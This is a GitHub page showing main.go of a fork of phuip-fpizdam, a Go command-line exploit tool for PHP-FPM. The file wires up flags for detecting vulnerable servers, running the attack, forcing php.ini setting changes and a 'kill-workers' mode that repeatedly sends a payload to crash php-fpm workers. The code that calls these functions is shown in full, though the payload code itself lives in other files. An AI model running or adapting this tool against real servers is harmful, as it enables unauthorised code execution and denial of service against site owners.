forked from neex/phuip-fpizdam
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathmain.go
124 lines (110 loc) · 3.84 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
package main
import (
"log"
"github.com/spf13/cobra"
)
func main() {
var (
method string
cookie string
setting string
skipDetect bool
skipAttack bool
killWorkers bool
killCount int
resetSetting bool
resetRetries int
onlyQSL bool
params = &AttackParams{}
)
var cmd = &cobra.Command{
Use: "phuip-fpizdam [url]",
Args: cobra.ExactArgs(1),
Run: func(cmd *cobra.Command, args []string) {
url := args[0]
m, ok := Methods[method]
if !ok {
log.Fatalf("Unknown detection method: %v", method)
}
requester, err := NewRequester(url, cookie)
if err != nil {
log.Fatalf("Failed to create requester: %v", err)
}
if resetSetting {
if !params.Complete() {
log.Fatal("--reset-setting requires complete params")
}
if setting == "" {
setting = m.PHPOptionDisable
}
if resetRetries == -1 {
resetRetries = 1 << 32
}
if err := SetSetting(requester, params, setting, resetRetries); err != nil {
log.Fatalf("ResetSetting() returned error: %v", err)
}
log.Printf("I did my best trying to set %#v", setting)
return
}
if setting != "" {
log.Fatal("--setting requires --reset-setting")
}
if killWorkers {
if params.QueryStringLength == 0 {
log.Fatal("QSL value is required for killing workers")
}
// The breaking payload is 4 bytes shorter than usual (34), so we have
// (Δ|SCRIPT_FILENAME| + Δ|REQUEST_URI| + Δ|DOCUMENT_URI|)/2 = 6.
// This probably won't work in some configurations.
params.QueryStringLength += 6
if err := KillWorkers(requester, params, killCount); err != nil {
log.Fatalf("KillWorkers() returned error: %v", err)
}
log.Printf("all done")
return
}
if skipDetect {
if !params.Complete() {
log.Fatal("Got --skip-detect and attack params are incomplete, don't know what to do")
}
log.Printf("Using attack params %s", params)
} else {
var err error
params, err = Detect(requester, m, params, onlyQSL)
if err != nil {
if err == errPisosBruteForbidden && onlyQSL {
log.Printf("Detect() found QSLs and that's it")
return
}
log.Fatalf("Detect() returned error: %v", err)
}
if !params.Complete() {
log.Fatal("Detect() returned incomplete attack params, something gone wrong")
}
log.Printf("Detect() returned attack params: %s <-- REMEMBER THIS", params)
}
if skipAttack || onlyQSL {
log.Print("Attack phase is disabled, so that's it")
return
}
if err := Attack(requester, params); err != nil {
log.Fatalf("Attack returned error: %v", err)
}
},
}
cmd.Flags().StringVar(&method, "method", "session.auto_start", "detect method (see detect_methods.go)")
cmd.Flags().StringVar(&cookie, "cookie", "", "send this cookie")
cmd.Flags().IntVar(¶ms.QueryStringLength, "qsl", 0, "qsl hint")
cmd.Flags().IntVar(¶ms.PisosLength, "pisos", 0, "pisos hint")
cmd.Flags().BoolVar(&skipDetect, "skip-detect", false, "skip detection phase")
cmd.Flags().BoolVar(&skipAttack, "skip-attack", false, "skip attack phase")
cmd.Flags().BoolVar(&onlyQSL, "only-qsl", false, "stop after QSL detection, use this if you just want to check if the server is vulnerable")
cmd.Flags().BoolVar(&resetSetting, "reset-setting", false, "try to reset setting (requires attack params)")
cmd.Flags().IntVar(&resetRetries, "reset-retries", SettingEnableRetries, "how many retries to do for --reset-setting, -1 means 2**32")
cmd.Flags().StringVar(&setting, "setting", "", "specify custom php.ini setting for --reset-setting")
cmd.Flags().BoolVar(&killWorkers, "kill-workers", false, "just kill php-fpm workers (requires only QSL)")
cmd.Flags().IntVar(&killCount, "kill-count", SettingEnableRetries, "how many times to send the worker killing payload")
if err := cmd.Execute(); err != nil {
log.Fatal(err)
}
}